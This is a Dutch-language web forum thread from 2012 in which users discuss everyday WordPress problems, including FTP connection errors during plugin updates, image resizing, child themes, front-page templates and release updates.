als ik bv. plugins wil installeren of updaten via het admin dashboard.

dan vraagt die om mijn ftp gegevens
geen probleem verder maar als ik hier mijn gegevens invul krijg ik de volgende melding.
code:
1
 Failed to connect to FTP Server localhost:21

met deze zelfde gegevens kan ik gewoon een ftp verbinding opzetten in filezilla.
ook als ik bij de hostname het ipadres neer zet krijg ik dezelfde melding.

op de machine zelf kan ik ook gewoon een ftp verbinding opzetten naar zichzelf zeg maar.

het gaat om een linux centos host waar de php-ftp module actief is.

heeft iemand een idee wat hier aan de hand is?

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Dat gaat vaker fout moet ik zeggen, volgens mij ligt dat echt aan de FTP instellingen van je host... want de home directory van je ftp account moet volgens mij in de wp root uitkomen. Maar vaak is dat een dir boven public_html.

Maar zelf even de plugins uploaden via FTP is niet zo heel veel extra werk toch?

En anders een extra ftp-account aanmaken waarvan de home-directory de root van je WP installatie is.

Acties:
  • 0 Henk 'm!

• RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
@sk1nny666: open even een topic; dit topic is hier niet voor bedoeld. De grote topicwarning moet dat toch wel duidelijk maken dacht ik zo...

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

Acties:
  • 0 Henk 'm!

• sk1nny666
  • Registratie: Juli 2008
  • Laatst online: 05-09 09:28
@thenephilim: dankje dat is bij mij inderdaat het geval.

@rob: zal de volgende keer een nieuw topic aanmaaken.

Acties:
  • 0 Henk 'm!

• CH4OS
  • Niet online

CH4OS

It's a kind of magic

sk1nny666 schreef op maandag 23 april 2012 @ 15:49:
ik zit hier een beetje me een probleem.

als ik bv. plugins wil installeren of updaten via het admin dashboard.

dan vraagt die om mijn ftp gegevens
geen probleem verder maar als ik hier mijn gegevens invul krijg ik de volgende melding.
code:
1
 Failed to connect to FTP Server localhost:21

met deze zelfde gegevens kan ik gewoon een ftp verbinding opzetten in filezilla.
ook als ik bij de hostname het ipadres neer zet krijg ik dezelfde melding.

op de machine zelf kan ik ook gewoon een ftp verbinding opzetten naar zichzelf zeg maar.

het gaat om een linux centos host waar de php-ftp module actief is.

heeft iemand een idee wat hier aan de hand is?
Wat je kan proberen is de FTP dusdanig in te vullen dat hij inlogt zoals jij ook inlogt op de FTP. Als de WordPress dus achter een .nl domein zit, dan vul je daar dus het domeinnaam in, niet localhost.
Sommige hosts hebben een aparte file server, die de files serveert voor de websites. Open je dus localhost als FTP-server, dan pakt hij de FTP op de webserver, terwijl dat dus niet de FTP-server is die je hebben moet. Check dit dus even met je hoster.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Wordpress 3.3.2 is uit!

http://wordpress.org/news/2012/04/wordpress-3-3-2/

Geen belangrijke veranderingen als ik het zo lees, meer een security update.

Acties:
  • 0 Henk 'm!

• CH4OS
  • Niet online

CH4OS

It's a kind of magic

Stond van de week ook al op de frontpage: meuk: WordPress 3.3.2.

Acties:
  • 0 Henk 'm!

• JeroenH
  • Laatst online: 21:23
TheNephilim schreef op dinsdag 24 april 2012 @ 11:28:
Wordpress 3.3.2 is uit!

http://wordpress.org/news/2012/04/wordpress-3-3-2/

Geen belangrijke veranderingen als ik het zo lees, meer een security update.
Nou da's toch wel belangrijk. Volgens mij worden toch wel vrij veel WP-sites gehackt omdat ze verouderde en dus kwetsbare versies draaien. Dat grote Apple-virus van laatst schijnt zich ook via een Wordpress vulnerability te verspreiden...

Xtool D1 10w laser cutter - IoT moet nooit op internet - 3x HomeWizard plug-in batterij, totaal 8,1 kWh / 2400 watt / 2400 watt, aansturing met Home Assistant

Acties:
  • 0 Henk 'm!

• CH4OS
  • Niet online

CH4OS

It's a kind of magic

Daarnaast is het uiteraard niet alleen zaak om WordPress zelf up to date te houden.
Ook de plugins kunnen security issues opleveren. ;)

Acties:
  • 0 Henk 'm!

• JeroenH
CptChaos schreef op dinsdag 24 april 2012 @ 12:29:
Daarnaast is het uiteraard niet alleen zaak om WordPress zelf up to date te houden.
Ook de plugins kunnen security issues opleveren. ;)
Oh absoluut, vaak meer nog dan WP. Een flink aantal plugins wordt toch ontwikkeld door, laten we zeggen, wat minder professionele entiteiten dan Wordpress zelf.

Xtool D1 10w laser cutter - IoT moet nooit op internet - 3x HomeWizard plug-in batterij, totaal 8,1 kWh / 2400 watt / 2400 watt, aansturing met Home Assistant

Acties:
  • 0 Henk 'm!

• Joopieboy

Joopieboy

No smoke, no poke

Dank trouwens nogmaals voor de tips hierboven! Inmiddels een aantal dingen aan mijn site aangepast, en zo ben ik inmiddels ook bezig met de zogeheten more tag. Die werkt nu zoals ik zou willen, alleen als je klikt op de link van de more functie, dan word mijn permlink gewijzigd. Die word dan van "28-4-2012" gewijzigd in "28-4-2012#more-2148".

Dat stoort mij dus nogal, zit al een tijdje te zoeken op more tag en permlink maar kon nog niks tegen.

Het is eigenlijk hetzelfde als je doorlinkt naar een link die je een naam hebt meegegeven, die komt ook terug in het adres...

Acties:
  • 0 Henk 'm!

Verwijderd

Ik heb het nu een beetje door hoe je de rollen erbij kan maken. Maar ik kan nergens ontdekken hoe ik bij de capabilities een rol kan maken op die manier dat een willekeurig iemand die zich registreert 1 pagina krijgt en alleen die pagina mag editten. Is dat een beetje gangbaar en/of makkelijk voor elkaar te krijgen?

Acties:
  • 0 Henk 'm!

• Vincitore
Ik ben bezig om mijn website http://www.jouwafspraak.nl et updaten. Met de site wil ik graag een online agenda aanbieden aan bedrijven. Klanten kunnen hierin een afspraak plannen waarbij deze wordt bevestigd. Het bedrijf kan hierbij de online agenda inzetten als marketing tool.

De huidige homepage indeling zou mooi zijn maar dan allemaal wat gelikter. Naast de 'intro' tekst in het blok zou bijv. een mooie zoekoptie kunnen komen. In de huidige 3 blokken de laatste tweets, nieuwsberichten van de site of laatst aangemelde praktijken bijv.

De zoekoptie is het belangrijkste, maar dat past helaas niet in het huidge thema. Ik heb me al meerdere malen rot gezocht naar zo'n thema, maar kan niets vinden. Kennen jullie bepaalde thema's?

Betalen met iDeal integratie voor verkoop aan bedrijven voor aanmelding: Bedrijven bestellen via formulier en kunnen kiezen voor iDeal betaling. Heb gekozen voor Gravity Forms icm iDeal, maar is hier ook een (goedkopere) oplossing voor?

Stats

Acties:
  • 0 Henk 'm!

• Deef_K
  • Registratie: September 2007
  • Laatst online: 22:14
Je kan toch gewoon het zoekveld er bij zetten via wp code? Beetje stijlen naar wens en klaar.

Acties:
  • 0 Henk 'm!

• Martijn19
Vincitore schreef op vrijdag 01 juni 2012 @ 08:43:
Ik ben bezig om mijn website http://www.jouwafspraak.nl et updaten. Met de site wil ik graag een online agenda aanbieden aan bedrijven. Klanten kunnen hierin een afspraak plannen waarbij deze wordt bevestigd. Het bedrijf kan hierbij de online agenda inzetten als marketing tool.

De huidige homepage indeling zou mooi zijn maar dan allemaal wat gelikter. Naast de 'intro' tekst in het blok zou bijv. een mooie zoekoptie kunnen komen. In de huidige 3 blokken de laatste tweets, nieuwsberichten van de site of laatst aangemelde praktijken bijv.

De zoekoptie is het belangrijkste, maar dat past helaas niet in het huidge thema. Ik heb me al meerdere malen rot gezocht naar zo'n thema, maar kan niets vinden. Kennen jullie bepaalde thema's?

Betalen met iDeal integratie voor verkoop aan bedrijven voor aanmelding: Bedrijven bestellen via formulier en kunnen kiezen voor iDeal betaling. Heb gekozen voor Gravity Forms icm iDeal, maar is hier ook een (goedkopere) oplossing voor?
Het zijn twee columns, je kan gewoon een searchbox daarin plaatsen lijkt mij. Eventueel hardcoded in je template files.
Voor een theme raad ik meestal ThemeForest aan, WooThemes is ook een goede.

Acties:
  • 0 Henk 'm!

• Vincitore
Nooit aan gedacht, ga ik eens proberen!

De Woothemes en van themeforest zijn altijd mooi inderdaad!
Net gekeken naar de theme Karma, geweldige theme en zou deze graag gebruiken. Nu eens zien of ik er een leuke zoekfunctie op kan maken...

http://demo.truethemes.net/Karma-Wordpress/

[ Voor 48% gewijzigd door Vincitore op 01-06-2012 22:24 ]

Stats

Acties:
  • 0 Henk 'm!

• StephanVierkant
  • Registratie: Mei 2003
  • Laatst online: 08-09 16:22
Heb onlangs Xdebug gebruikt om de performance van een WordPress-installatie onder de loep te nemen. Ondanks de installatie van W3 Total Cache (inclusief Memcache e.d.) en 16 GB (!) RAM kon de website maar 16 pagina's per seconde server.

Behalve een aantal brakke plugins en te grote afbeeldingen, bleek heel iets anders de echte grote boosdoener te zijn. Uiteindelijk bleek zo'n 75 van de tijd te gaan naar de functie 'load_textdomain' in wp-includes/l10n.php. Heb uiteindelijk deze patch gebruikt: http://oss.tiggerswelt.net/wordpress/3.3.1/

Iemand ook ditzelfde probleem al eens gehad?

Acties:
  • 0 Henk 'm!

• geert1
  • Registratie: Maart 2006
  • Laatst online: 10-09 15:53
Ik heb één groot manco wat betreft Wordpress en ben benieuwd of andere mensen dit ook zo ervaren, of dat er zelfs een goede oplossing voor is. Het gaat om de omgang van Wordpress met afbeeldingen. Deze worden alleen tijdens het uploaden naar de ingestelde formaten geschaald en opgeslagen. Ik heb een sterke behoefte aan de mogelijkheid om in een template een formaat op te kunnen geven, zodat er at runtime pas wordt ge-resized (uiteraard met caching). Dit zou naar mijn idee een stuk flexibeler en krachtiger zijn, en is ook de manier waarop de meeste platformen werken. De Wordpress-insteek zorgt ervoor dat door design-aanpassingen of bij een redesign vaak de afbeeldingen verkeerde formaten hebben. Die je dan met een plug-in (!) allemaal kunt laten resizen. Persoonlijk vind ik dit enorm knullig en onprofessioneel. Hoe staan jullie hier tegenover en is het mogelijk om dit anders / beter aan te pakken?

[ Voor 5% gewijzigd door geert1 op 03-06-2012 14:59 ]

Acties:
  • 0 Henk 'm!

• _WgV_
  • Registratie: Februari 2002
  • Laatst online: 22-07 17:00

_WgV_

It's a magical world!

geert1 schreef op zondag 03 juni 2012 @ 14:46:
Ik heb één groot manco wat betreft Wordpress en ben benieuwd of andere mensen dit ook zo ervaren, of dat er zelfs een goede oplossing voor is. Het gaat om de omgang van Wordpress met afbeeldingen. Deze worden alleen tijdens het uploaden naar de ingestelde formaten geschaald en opgeslagen. Ik heb een sterke behoefte aan de mogelijkheid om in een template een formaat op te kunnen geven, zodat er at runtime pas wordt ge-resized (uiteraard met caching). Dit zou naar mijn idee een stuk flexibeler en krachtiger zijn, en is ook de manier waarop de meeste platformen werken. De Wordpress-insteek zorgt ervoor dat door design-aanpassingen of bij een redesign vaak de afbeeldingen verkeerde formaten hebben. Die je dan met een plug-in (!) allemaal kunt laten resizen. Persoonlijk vind ik dit enorm knullig en onprofessioneel. Hoe staan jullie hier tegenover en is het mogelijk om dit anders / beter aan te pakken?
Volgens mij doet wordpress het juist precies zoals jij het voorsteld: http://codex.wordpress.or...thumbnail#Thumbnail_Sizes

#StopBurningStuff

Acties:
  • 0 Henk 'm!

• geert1
_WgV_ schreef op dinsdag 05 juni 2012 @ 11:05:
Volgens mij doet wordpress het juist precies zoals jij het voorsteld: http://codex.wordpress.or...thumbnail#Thumbnail_Sizes
Nee helaas niet. Met die functie kun je een afbeelding in één van de vooropgegeven formaten tonen in een template. Is op zich prima, maar als je later besluit dat je een bepaald soort afbeelding groter wilt hebben, of er nog een paar formaten bij wilt hebben, dan heb je een plugin nodig die alles op één moment voor je gaat resizen en opslaan en dat werkt mij te omslachtig.

Misschien is Wordpress gewoon niet het CMS voor mij. Ik heb ook moeite met de wel erg simpele implementatie van custom post types. Om hier op een mooie manier afwijkende velden bij te plaatsen zijn weer plugins nodig bijvoorbeeld. Misschien maar eens kijken naar ExpressionEngine, Adobe Business Catalyst en een aantal andere CMSen.

Acties:
  • 0 Henk 'm!

• xtra
Voor on-demand resizen zijn ook plug-ins :)

Ik vind het niet onprofessioneel dat WP dat niet doet. De kracht van WP vind ik juist dat je een basissysteem kunt uitbreiden met vrijwel alles wat je kunt verzinnen.

Als je los wilt gaan met custom post types dan kan ik me voorstellen dat je ook naar andere systemen gaat kijken. WP wordt dan snel weer een blog met wat extra velden.

Acties:
  • 0 Henk 'm!

• MsG
  • Registratie: November 2007
  • Laatst online: 22:26

MsG

Forumzwerver

Ik zou je dan Drupal aanraden, dat is meer modulair alsof je met Lego werkt. Ik zie ook Wordpress veel gebruikt worden, maar zodra je meer wil dan standaard aangeboden wordt, moet je je door slecht geïntegreerde plugins heen werken.

Denk om uw spatiegebruik. Dit scheelt Tweakers.net kostbare databaseruimte! | Groninger en geïnteresseerd in Domotica? Kom naar DomoticaGrunn

Acties:
  • 0 Henk 'm!

• geert1
MsG schreef op woensdag 06 juni 2012 @ 01:39:
Ik zou je dan Drupal aanraden, dat is meer modulair alsof je met Lego werkt. Ik zie ook Wordpress veel gebruikt worden, maar zodra je meer wil dan standaard aangeboden wordt, moet je je door slecht geïntegreerde plugins heen werken.
Precies wat ik ook ervaar. Er wordt altijd maar geroepen dat Wordpress voor alles geschikt is, met als argument de grote hoeveelheid plug-ins. Die vlieger gaat lang niet altijd op als je kwaliteit wilt bieden. De admin-omgeving wordt er meestal niet logischer / gebruiksvriendelijk op als je met verschillende plugins werkt die allemaal net weer anders werken / er anders uit zien. Allemaal prima voor de niet al te veeleisende gebruiker, maar daar reken ik mezelf niet bij :)

Zit nu o.a. te kijken naar ExpressionEngine. Niet gratis, maar ziet er wel interessant uit. Drupal ook maar eens checken idd.

Acties:
  • 0 Henk 'm!

• Martijn19
Voor Entreprise oplossingen zou ik ook eerder naar Drupal, ExperessionEngine, Typo3 of iets dergelijks gaan kijken.

Het zoeken van juiste plugins is inderdaad een klus, overigens kan je zelf de admin area indelen zoals je zelf wilt. Ik heb voor de gemiddelde klant de backend behoorlijk opgeschoont met overbodige / te moeilijke informatie waardoor ik in tegenstelling tot collega's voor minder geld maar met eendezelfde marge websites kan verkopen.

Wat ik ook niet snap is waarom je allemaal plugins wilt hebben die "net wat anders doen", je pakt een plugin die aan je eisen voldoet neem ik aan?

Voor hele specialistische websites verwijs ik een klant liever door naar een collega die alles maatwerk maakt. Het is maar net wat je ding is.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

geert1 schreef op zondag 03 juni 2012 @ 14:46:
On-the-fly afbeeldingen resizen? Dus op het moment dat je een pagina op de website laad, dat hij dan steeds de afbeeldingen resized?

Nou je kunt me veel wijs maken, maar als er iets efficiënt is, dat is het in ieder geval niet. Afbeeldingen resizen etc kost veel processor kracht, dus met een groot aantal afbeeldingen op een pagina (fotoalbum etc.) kun je load tijden verwachten van heb ik jou daar.

Wordpress loopt inderdaad achter wat betreft afbeeldingen. Ik mis nog steeds de mogelijkheid om croppen in een venster te krijgen. Of beter gezegd, om een afbeeldingen achteraf opnieuw te croppen en handmatig het beeldgebied te selecteren.

Er zijn inderdaad plugins waarmee je alle afbeeldingen opnieuw kunt resizen aan de hand van toegevoegde afbeeldingsgroottes. Dit komt echter zo weinig voor, dat je zo'n plugin niet vaak nodig hebt. Echter zou het prima passen onder het kopje 'Media' of 'Instellingen' om een knopje mee te nemen in de Wordpress core die dit voor z'n rekening neemt.

Cachen van afbeeldingen moet je eigenlijk regelen met je webserver. In Apache volstaat een 'Cache expires' header al om te zorgen dat de afbeeldingen gecached worden aan de browser kant. Je kunt ook een plugin als W3 Total Cache installeren, daar heb je meer cache opties en tevens de mogelijkheid om afbeeldingen in een CDN te gooien. Zowel op eigen manier (via ftp) of via een gerenomeerde CND aanbieder zoals Level 3.

Acties:
  • 0 Henk 'm!

• JeroenH
Wordpress 3.4 'Green' is uit: http://wordpress.org/news/2012/06/green/

Zojuist geïnstalleerd, geen problemen.

Acties:
  • 0 Henk 'm!

• Freeman
  • Registratie: Maart 2009
  • Laatst online: 13-09 09:45
Voor een maat heb ik een simpele wordpress website in elkaar gezet.
Het gaat om de volgende website: www.mccrafty.nl (Mijn eerste WP siteje)

Nu zag ik zojuist dat wp 3.4 is uitgekomen.
Ik las al meteen dat het wordt aangeraden om chilld themes te gebruiken (Dit heb ik volgens mij niet gedaan).

Op dit moment maak ik gebruik van de theme Weaver 2.2.8 (Is dit nou een childtheme of haal ik alles door elkaar?)

Mijn opvatting van een childtheme was dat je standaard Wordpress heb draaien met op de achtergrond een childtheme, weaver?

Nu wil ik dus gaan updaten, is dit aangeraden?
Of verlies ik al mijn data?

M.v.g. Johnny

Acties:
  • 0 Henk 'm!

• Martijn19
Johnnyzz schreef op donderdag 14 juni 2012 @ 21:47:

Ik las al meteen dat het wordt aangeraden om chilld themes te gebruiken (Dit heb ik volgens mij niet gedaan).

Op dit moment maak ik gebruik van de theme Weaver 2.2.8 (Is dit nou een childtheme of haal ik alles door elkaar?)

Mijn opvatting van een childtheme was dat je standaard Wordpress heb draaien met op de achtergrond een childtheme, weaver?

M.v.g. Johnny
WordPress gewoon updaten naar 3.4 ;)

Sommige themes ondersteunen child themes, dat wil zeggen dat jij een child theme maakt gebaseerd op de hoofd theme, als de hoofd theme dan geupdate word dan verlies jij je aanpassingen niet. Hiermee bedoel ik aanpassingen in de code en niet in de instellingen.

Acties:
  • 0 Henk 'm!

• geert1
TheNephilim schreef op woensdag 13 juni 2012 @ 09:54:
On-the-fly afbeeldingen resizen? Dus op het moment dat je een pagina op de website laad, dat hij dan steeds de afbeeldingen resized?

Nou je kunt me veel wijs maken, maar als er iets efficiënt is, dat is het in ieder geval niet. Afbeeldingen resizen etc kost veel processor kracht, dus met een groot aantal afbeeldingen op een pagina (fotoalbum etc.) kun je load tijden verwachten van heb ik jou daar.
Dit is gemakkelijk te voorkomen, en zowat elk cms doet het zoals ik omschreef. Er wordt simpelweg gecheckt (in php): heb ik deze afbeelding al op dit formaat opgeslagen? Zo ja, dan niks doen. Zo nee, dan de afbeelding schalen en opslaan. Zo hoeft elke afbeelding op elk formaat maar één keer gemaakt te worden en dus gaat je argumentatie niet op. Dan heb je namelijk het prima performance, terwijl je ook de vrijheid hebt om tijdens het ontwikkelen of tijdens een redesign gemakkelijk je afbeeldingen op een ander formaat te tonen. Zonder alles opnieuw te hoeven genereren via een plugin.

Maar goed, ik val nu in herhaling en het komt erop neer dat deze wens van mij niet snel in de Wordpress core terecht zal komen. Er wordt in elk geval nergens over geschreven. Er werd hier wel gezegd dat er plugins bestaan die on-demand resizing bieden, dus dat zou nog een optie zijn.

Verder wel met je eens dat de algehele omgang met afbeeldingen in Wordpress beter kan. Op zich werkt het aardig, maar inderdaad te weinig opties wat betreft croppen bijvoorbeeld.

Acties:
  • 0 Henk 'm!

• geert1
Johnnyzz schreef op donderdag 14 juni 2012 @ 21:47:

M.v.g. Johnny
In Wordpress bestaan themes, waar alle vormgeving en front-end code in staat. Deze zijn los van de Wordpress core zodat de installatie geüpdatet kan worden met behoud van je thema. Een thema kan dan op zijn beurt nog weer een child thema onder zich hebben. Dit is een keuze die je kunt maken, wanneer je het thema ook wilt kunnen updaten.

Dus: Wordpress core -> theme -> child theme.

Ik bouw zelf vaak een eigen thema of pas een bestaand thema aan zonder child theme te gebruiken. Hiermee geef je de optie op om het thema nog automatisch te kunnen updaten, maar Wordpress zelf kun je dan alsnog wel updaten. Kies je voor het gebruik van een child thema, dan kun je het hoofdthema waar deze op gebaseerd is nog updaten. Thema-bouwers brengen soms updates uit en Wordpress' eigen thema's worden soms ook voorzien van updates. Zonder een child thema kun je hier dus geen gebruik van maken (maar dit hoeft op zich niet erg te zijn als je het toch liever zelf in de hand hebt). Hoop dat het hiermee wat duidelijker wordt :)

[ Voor 12% gewijzigd door geert1 op 15-06-2012 10:09 ]

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

geert1 schreef op vrijdag 15 juni 2012 @ 10:03:
[...]

Dit is gemakkelijk te voorkomen, en zowat elk cms doet het zoals ik omschreef. Er wordt simpelweg gecheckt (in php): heb ik deze afbeelding al op dit formaat opgeslagen? Zo ja, dan niks doen. Zo nee, dan de afbeelding schalen en opslaan. Zo hoeft elke afbeelding op elk formaat maar één keer gemaakt te worden en dus gaat je argumentatie niet op. Dan heb je namelijk het prima performance, terwijl je ook de vrijheid hebt om tijdens het ontwikkelen of tijdens een redesign gemakkelijk je afbeeldingen op een ander formaat te tonen. Zonder alles opnieuw te hoeven genereren via een plugin.

Maar goed, ik val nu in herhaling en het komt erop neer dat deze wens van mij niet snel in de Wordpress core terecht zal komen. Er wordt in elk geval nergens over geschreven. Er werd hier wel gezegd dat er plugins bestaan die on-demand resizing bieden, dus dat zou nog een optie zijn.

Verder wel met je eens dat de algehele omgang met afbeeldingen in Wordpress beter kan. Op zich werkt het aardig, maar inderdaad te weinig opties wat betreft croppen bijvoorbeeld.
Klopt, maar dat betekend dat je krijgt; image.php?attachment_id=1337. Voor elke afbeelding een call naar de backend (php), lijkt me niet optimaal. Dan is gebruik van een aparte server voor static files niet meer mogelijk en krijg je veel te veel dure requests. Misschien dat het op te lossen is met een caching plugin, maar in de basis is het niet goed.

Acties:
  • 0 Henk 'm!

• Freeman
geert1 schreef op vrijdag 15 juni 2012 @ 10:07:
[...]

In Wordpress bestaan themes, waar alle vormgeving en front-end code in staat. Deze zijn los van de Wordpress core zodat de installatie geüpdatet kan worden met behoud van je thema. Een thema kan dan op zijn beurt nog weer een child thema onder zich hebben. Dit is een keuze die je kunt maken, wanneer je het thema ook wilt kunnen updaten.

Dus: Wordpress core -> theme -> child theme.

Ik bouw zelf vaak een eigen thema of pas een bestaand thema aan zonder child theme te gebruiken. Hiermee geef je de optie op om het thema nog automatisch te kunnen updaten, maar Wordpress zelf kun je dan alsnog wel updaten. Kies je voor het gebruik van een child thema, dan kun je het hoofdthema waar deze op gebaseerd is nog updaten. Thema-bouwers brengen soms updates uit en Wordpress' eigen thema's worden soms ook voorzien van updates. Zonder een child thema kun je hier dus geen gebruik van maken (maar dit hoeft op zich niet erg te zijn als je het toch liever zelf in de hand hebt). Hoop dat het hiermee wat duidelijker wordt :)
Ik maak gebruik van de theme Weaver, deze theme heeft veel instellingen. Voor zover ik weet heb ik aan de Wordpress core weinig tot niks aan veranderd.
Ook zag ik dat de Weaver theme een update heeft.

Kan ik beide (Wordpress + Theme) updaten zonder bepaalde handelingen te verrichten?
Of is het verstandig om eerst andere stappen te volgen?

Excuses voor de vragen dit is mijn eerste echte Wordpress "project", bevalt me goed :)

Acties:
  • 0 Henk 'm!

• xtra
TheNephilim schreef op vrijdag 15 juni 2012 @ 10:23:
[...]

Klopt, maar dat betekend dat je krijgt; image.php?attachment_id=1337. Voor elke afbeelding een call naar de backend (php), lijkt me niet optimaal. Dan is gebruik van een aparte server voor static files niet meer mogelijk en krijg je veel te veel dure requests. Misschien dat het op te lossen is met een caching plugin, maar in de basis is het niet goed.
Ik heb pas Custom Image Sizes gebruikt. Die maakt de afbeelding eenmalig zodat je geen performance verliest.

Acties:
  • 0 Henk 'm!

• geert1
TheNephilim schreef op vrijdag 15 juni 2012 @ 10:23:
Wat je zegt is slechts één manier om dit te tackelen, en geen bijzonder goede. Ik ben zelf geen backend-programmeur, maar ik weet dat het prima mogelijk is om afbeeldingen on-the-fly te schalen zonder performance-problemen, en bestandsnamen als je hier noemt zijn ook zeker niet nodig. Dat werd jaren terug wel eens gedaan, tegenwoordig wil je altijd in de front-end een normale bestandsnaam met extensie in je src-attribuut hebben staan. Vanwege SEO en omdat het conventie is.
xtra schreef op vrijdag 15 juni 2012 @ 12:46:
[...]

Ik heb pas Custom Image Sizes gebruikt. Die maakt de afbeelding eenmalig zodat je geen performance verliest.
Zoiets bedoel ik inderdaad. Zou zo mooi zijn als dit native werd ondersteund! Mooi om te weten dat er in elk geval plugins zijn die benaderen waar ik op doelde.
Johnnyzz schreef op vrijdag 15 juni 2012 @ 10:33:
Ik maak gebruik van de theme Weaver, deze theme heeft veel instellingen. Voor zover ik weet heb ik aan de Wordpress core weinig tot niks aan veranderd.
Ook zag ik dat de Weaver theme een update heeft.

Kan ik beide (Wordpress + Theme) updaten zonder bepaalde handelingen te verrichten?
Of is het verstandig om eerst andere stappen te volgen?

Excuses voor de vragen dit is mijn eerste echte Wordpress "project", bevalt me goed :)
Als je zelf aanpassingen hebt gedaan in de bestanden van het Weaver-thema, zoals de css of de .php templates, dan gaan deze wijzigingen verloren bij een update van je thema. Een update van Wordpress zelf zou in principe altijd moeten kunnen. Als je de bestanden van je thema niet hebt aangepast, dan kun je het thema ook zonder problemen updaten.

Acties:
  • 0 Henk 'm!

• Freeaqingme
  • Registratie: April 2006
  • Laatst online: 13-09 18:54
maar ik weet dat het prima mogelijk is om afbeeldingen on-the-fly te schalen zonder performance-problemen
Uhm, ja, sure. Als je 100K+ unieke bezoekers per dag hebt ga je dus echt niet iedere keer hetzelfde plaatje live resizen...

No trees were harmed in creating this message. However, a large number of electrons were terribly inconvenienced.

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

Freeaqingme schreef op zaterdag 16 juni 2012 @ 15:56:
[...]

Uhm, ja, sure. Als je 100K+ unieke bezoekers per dag hebt ga je dus echt niet iedere keer hetzelfde plaatje live resizen...
Inderdaad, voor een hobby website geen probleem, maar met honderden bezoekers tegelijkertijd online dan merk je dat zeer zeker. Een website met flink wat bezoekers en een fotoalbum ga je soms al merken op een kleine dedicated server. Na het uploaden worden de foto's in verschillende groottes geresized en als de bron dan een foto van een paar MB is, duurt dat wel een stuk langer dan het serveren van de gemiddelde webpagina.

Dus geert1, je hebt gelijk, het kan on-the-fly zonder perfomance verlies. Echter praten we dan over een website met slechts enkele bezoekers en niet meer dan 3 requests per seconde.

Acties:
  • 0 Henk 'm!

• Fried
  • Registratie: Maart 2001
  • Laatst online: 25-03 08:42
Ik ben al 2 dagen aan het klooien om het volgende voor elkaar te krijgen;

1. ik wil een 'statische' homepage (welkom op de pagina blablabla) met daaronder ALLE nieuwsberichten
2. daarnaast heb ik wat andere subpagina's waarop alleen het nieuws uit die categorie geplaatst mag worden.

om het even visueel te krijgen:

3 categoriën: aardappelen, vlees, groente.
stel ik plaats een nieuwsbericht over aardappelen dan wil ik die zowel op de homepage (onder het welkom op de site stukje) als op de aardappelen subpagina weer laten geven.
berichten over vlees idem.

is dat mogelijk?

Acties:
  • 0 Henk 'm!

• Spinal
  • Registratie: Februari 2001
  • Laatst online: 08-09 14:12
Ja, dat is goed mogelijk. Wat lukt er niet?

Full-stack webdeveloper in Groningen

Acties:
  • 0 Henk 'm!

• Fried
al het bovenstaande :+

ik heb wat 'tutorials' proberen te volgen op het web, maar nog zonder het gewenste resultaat.. het is nu een brij geworden van pagina's, berichten, categorieën..
ik zou het zooitje eigenlijk allemaal even willen deleten en ineens goed doen.. maar hoe??

Acties:
  • 0 Henk 'm!

• Spinal
  • Registratie: Februari 2001
  • Laatst online: 08-09 14:12

Full-stack webdeveloper in Groningen

Acties:
  • 0 Henk 'm!

• Fried
nee nog niet, ik dacht dat het wellicht wel mogelijk was zonder in de php te gaan roeren.. dan moet het wel lukken.

heb je wellicht ook nog een idee mbt de 'sticky'-welkom op deze site boodschap, en daaronder al het nieuws?

Acties:
  • 0 Henk 'm!

• Vos

Vos

AFCA

Een pagina Home aanmaken, daaraan een 'home template' koppelen. Dan roep je daarin de content op van de pagina Home en je roept alle posts op. Je zult dus wel in de php moeten duiken...

Acties:
  • 0 Henk 'm!

• TheNephilim

TheNephilim

Wtfuzzle

front-page.php voor een static voorpagina pagina en home.php voor blogpagina.

Ideaal systeem trouwens, je kunt makkelijk instellen dat je voorpagina er heel anders uitziet dan de rest. Je kunt dan met WP_QUERY eenvoudig dingen uit verschillende categorieën laten zien.

Acties:
  • 0 Henk 'm!

Verwijderd

. verkeerde topic excuus

[ Voor 87% gewijzigd door Verwijderd op 14-07-2012 15:15 ]

Acties:
  • 0 Henk 'm!

• Nedra
TheNephilim schreef op dinsdag 19 juni 2012 @ 10:32:
front-page.php voor een static voorpagina pagina en home.php voor blogpagina.

Ideaal systeem trouwens, je kunt makkelijk instellen dat je voorpagina er heel anders uitziet dan de rest. Je kunt dan met WP_QUERY eenvoudig dingen uit verschillende categorieën laten zien.
dat dus! en WP query's zijn helemaal niet zo moeilijk om te implementeren, al is je PHP kennis nihil. Het is allemaal redelijk goed gedocumenteerd in de codex, met voorbeelden die je kan implementeren met direct resultaat.
http://codex.wordpress.org/Class_Reference/WP_Query

edit: en hier nog wat handige documentatie voor de post templates wat uitlegt wat een front-page.php, etc. precies doen.

[ Voor 12% gewijzigd door Nedra op 15-07-2012 14:01 ]

Acties:
  • 0 Henk 'm!

• De_Bastaard
  • Laatst online: 23:40
Heeft iemand van jullie misschien ervaring met het toevoegen van Google Maps aan Wordpress? Ik wil dus eigenlijk dat Viewers een locatie kunnen toevoegen, maar dat is nog niet zo simpel als ik dacht.

Met de Plug-ins die er momenteel beschikbaar zijn moeten de users zich registreren, omdat je alleen vanuit de back-end (je moet een post aanmaken) een locatie kunt toevoegen.

Ik wil het eigenlijk lekker simpel houden, een static page met alle markers op een map (die je daarna kunt filteren op basis van categorien) maar dat gebruikers wel relatief simpel een locatie kunnen toevoegen.

Iemand enig idee of dit kan met Wordpress, en of het überhaupt wel het handigste CMS hiervoor is?

De achterliggende management features zijn wel handig, gebruiker beheer, pagina/post beheer enz.

Acties:
  • 0 Henk 'm!

Verwijderd

Topicstarter
Hoog tijd dat ik de start post weer eens ga updaten...
De_Bastaard schreef op maandag 30 juli 2012 @ 09:34:
Heeft iemand van jullie misschien ervaring met het toevoegen van Google Maps aan Wordpress? Ik wil dus eigenlijk dat Viewers een locatie kunnen toevoegen, maar dat is nog niet zo simpel als ik dacht.

Met de Plug-ins die er momenteel beschikbaar zijn moeten de users zich registreren, omdat je alleen vanuit de back-end (je moet een post aanmaken) een locatie kunt toevoegen.

